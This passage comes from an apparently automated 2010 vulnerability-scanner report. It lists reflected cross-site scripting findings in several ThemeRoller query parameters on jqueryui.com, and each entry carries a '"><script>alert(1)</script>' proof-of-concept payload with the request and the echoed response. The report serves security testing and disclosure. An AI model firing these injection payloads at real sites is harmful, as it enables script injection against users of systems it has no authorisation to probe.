55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6b6c8"><script>alert(1)</script>794ffc806f6&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

1.92. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74466"><script>alert(1)</script>e3901bf7849 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px74466"><script>alert(1)</script>e3901bf7849 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px74466"><script>alert(1)</script>e3901bf7849" type="text/css" media="all" />
...[SNIP]...

1.93. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce12a"><script>alert(1)</script>57ff54b00b6 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121ce12a"><script>alert(1)</script>57ff54b00b6&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121ce12a"><script>alert(1)</script>57ff54b00b6&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

1.94. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebeba"><script>alert(1)</script>9e316bab61c was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222ebeba"><script>alert(1)</script>9e316bab61c&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222ebeba"><script>alert(1)</script>9e316bab61c&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

1.95. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f85e"><script>alert(1)</script>5ce0760a9c0 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555559f85e"><script>alert(1)</script>5ce0760a9c0&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555559f85e"><script>alert(1)</script>5ce0760a9c0&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

1.96. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d65d0"><script>alert(1)</script>042902ea54a was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ad65d0"><script>alert(1)</script>042902ea54a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ad65d0"><script>alert(1)</script>042902ea54a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

1.97. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7f9"><script>alert(1)</script>680216dd329 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222fb7f9"><script>alert(1)</script>680216dd329&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222fb7f9"><script>alert(1)</script>680216dd329&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

1.98. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac58"><script>alert(1)</script>288ea6641f4 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=3636364ac58"><script>alert(1)</script>288ea6641f4&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=3636364ac58"><script>alert(1)</script>288ea6641f4&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

1.99. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1729"><script>alert(1)</script>d30e2b92665 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121e1729"><script>alert(1)</script>d30e2b92665&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121e1729"><script>alert(1)</script>d30e2b92665&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

1.100. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3133c"><script>alert(1)</script>1841d7744ed was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif3133c"><script>alert(1)</script>1841d7744ed&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif3133c"><script>alert(1)</script>1841d7744ed&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

1.101. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

